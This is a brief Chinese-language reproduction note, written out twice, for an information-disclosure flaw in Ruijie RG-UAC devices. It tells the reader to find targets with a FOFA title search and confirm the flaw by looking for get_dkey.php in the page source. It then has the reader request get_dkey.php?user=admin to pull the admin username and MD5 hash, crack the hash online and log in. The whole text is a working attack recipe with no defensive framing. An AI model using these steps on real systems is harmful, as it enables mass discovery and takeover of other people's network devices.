复现过程:
在fofa搜索title="RG-UAC登录页面"
打开网站,ctrl+u源码搜索get_dkey.php,存在就有该漏洞
直接在网站路径加get_dkey.php?user=admin,得到用户名和md5密码
在线网站解密得到密码,直接登录成功
复现过程:
在fofa搜索title="RG-UAC登录页面"
打开网站,ctrl+u源码搜索get_dkey.php,存在就有该漏洞
直接在网站路径加get_dkey.php?user=admin,得到用户名和md5密码
在线网站解密得到密码,直接登录成功